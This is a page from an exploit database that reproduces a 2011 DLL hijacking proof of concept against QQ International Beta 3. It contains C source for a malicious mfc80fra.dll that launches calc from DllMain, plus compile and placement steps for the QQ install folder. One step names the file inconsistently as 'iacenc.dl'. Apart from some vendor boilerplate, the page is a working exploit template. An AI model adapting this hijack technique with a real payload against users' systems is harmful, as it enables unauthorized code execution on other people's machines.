Lucene search
K

QQ INTERNATIONAL v Bêta 3 DLL Hijacking Exploit (mfc80fra.dll)

🗓️ 19 Mar 2011 00:00:00Reported by MetropolisType 
zdt
 zdt
🔗 0day.today👁 27 Views

QQ International v Bêta 3 DLL Hijacking Exploit (mfc80fra.dll) - Metropoli

Code
/*
# Exploit Title: QQ INTERNATIONAL v Bêta 3 DLL Hijacking Exploit (mfc80fra.dll)
# Date: 18/03/2011
# Author: Metropolis
# Url: http://metropolis.fr.cr
# Software Link: http://www.toocharger.com/fiches/windows/qq-international/61560.htm
# Version: V1.2
# Tested on: Microsoft Windows XP Professional SP3 (FR)
# Information:
# http://en.wikipedia.org/wiki/Tencent_QQ
# Instructions:
# 1. Compile dll  
# gcc -shared -o mfc80fra.dll QQ.c
# 2. Add iacenc.dl
# C:\Program Files\Tencent\QQIntl\Bin
# 3. Launch QQ.exe
# 4. Calc DLL Hijacked! 
*/

#include <windows.h>
 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}



#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Mar 2011 00:00Current
6.8Medium risk
Vulners AI Score6.8
27